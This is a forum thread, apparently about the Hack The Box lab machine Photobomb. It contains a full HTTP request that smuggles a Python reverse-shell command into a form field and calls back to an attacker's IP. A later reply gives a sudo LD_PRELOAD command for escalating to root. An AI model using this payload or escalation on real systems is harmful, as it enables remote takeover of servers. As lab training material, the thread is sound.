October 8, 2022 at 8:49 PM
October 8, 2022 at 8:51 PM BURP REUQEST FOR SHELL POST /printer HTTP/1.1 Host: photobomb.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 295 Origin: http://photobomb.htb DNT: 1 Authorization: Basic cEgwdDA6YjBNYiE= Connection: close Referer: http://photobomb.htb/printer Upgrade-Insecure-Requests: 1 Sec-GPC: 1 photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png;export RHOST="YOUR IP";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'&dimensions=600x400 October 8, 2022 at 8:51 PM any idea for privilage escalation? October 8, 2022 at 8:54 PM October 8, 2022 at 8:56 PM For root: Compile a library, that will execute your payload. Then just use LD_PRELOAD, like:  October 8, 2022 at 8:57 PM October 8, 2022 at 9:02 PM October 8, 2022 at 9:04 PM (October 8, 2022, 09:02 PM)yumi Wrote: Linux Privilege Escalation using LD_Preload - Hacking Articles when I try to use the sudo it's asking for the password October 8, 2022 at 9:08 PM Matching Defaults entries for wizard on photobomb: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User wizard may run the following commands on photobomb: (root) SETENV: NOPASSWD: /opt/cleanup.sh no password required October 8, 2022 at 9:10 PM (October 8, 2022, 09:04 PM)achillescarter Wrote:(October 8, 2022, 09:02 PM)yumi Wrote: Linux Privilege Escalation using LD_Preload - Hacking Articles Save you shell.so in /tmp, then: sudo LD_PRELOAD=/tmp/shell.so /opt/cleanup.sh |